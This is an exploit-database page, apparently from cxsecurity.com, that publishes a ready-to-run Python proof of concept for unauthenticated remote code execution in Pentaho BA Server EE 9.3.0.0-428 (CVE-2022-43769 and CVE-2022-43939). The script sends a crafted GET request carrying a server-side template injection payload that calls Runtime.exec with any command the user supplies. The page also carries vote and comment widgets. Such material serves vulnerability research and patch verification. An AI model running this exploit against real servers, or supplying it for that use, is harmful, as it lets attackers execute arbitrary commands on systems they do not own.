Pentaho BA Server EE 9.3.0.0-428 Server-Side Template Injection / Remote Code Execution

2023.04.05
Credit: dwbzn
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

# Title: Pentaho BA Server EE 9.3.0.0-428 - RCE via Server-Side Template Injection (Unauthenticated) # Author: dwbzn # Date: 2022-04-04 # Vendor: https://www.hitachivantara.com/ # Software Link: https://www.hitachivantara.com/en-us/products/lumada-dataops/data-integration-analytics/download-pentaho.html # Version: Pentaho BA Server 9.3.0.0-428 # CVE: CVE-2022-43769, CVE-2022-43939 # Tested on: Windows 11 # Credits: https://research.aurainfosec.io/pentest/pentah0wnage # NOTE: This only works on the enterprise edition. Haven't tested it on Linux, but it should work (don't use notepad.exe). # Unauthenticated RCE via SSTI using CVE-2022-43769 and CVE-2022-43939 (https://research.aurainfosec.io/pentest/pentah0wnage) import requests import argparse parser = argparse.ArgumentParser(description='CVE-2022-43769 + CVE-2022-43939 - Unauthenticated RCE via SSTI') parser.add_argument('baseurl', type=str, help='base url e.g. http://127.0.0.1:8080/pentaho') parser.add_argument('--cmd', type=str, default='notepad.exe', nargs='?', help='command to execute (default notepad.exe)', required=False) args = parser.parse_args() url = f"{args.baseurl}/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{{T(java.lang.Runtime).getRuntime().exec('{args.cmd}')}}&mgrDn=a&pwd=a" print ("running...") r = requests.get(url) if r.text == 'false': print ("command should've executed! nice.") else: print ("didn't work. sadge...")


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top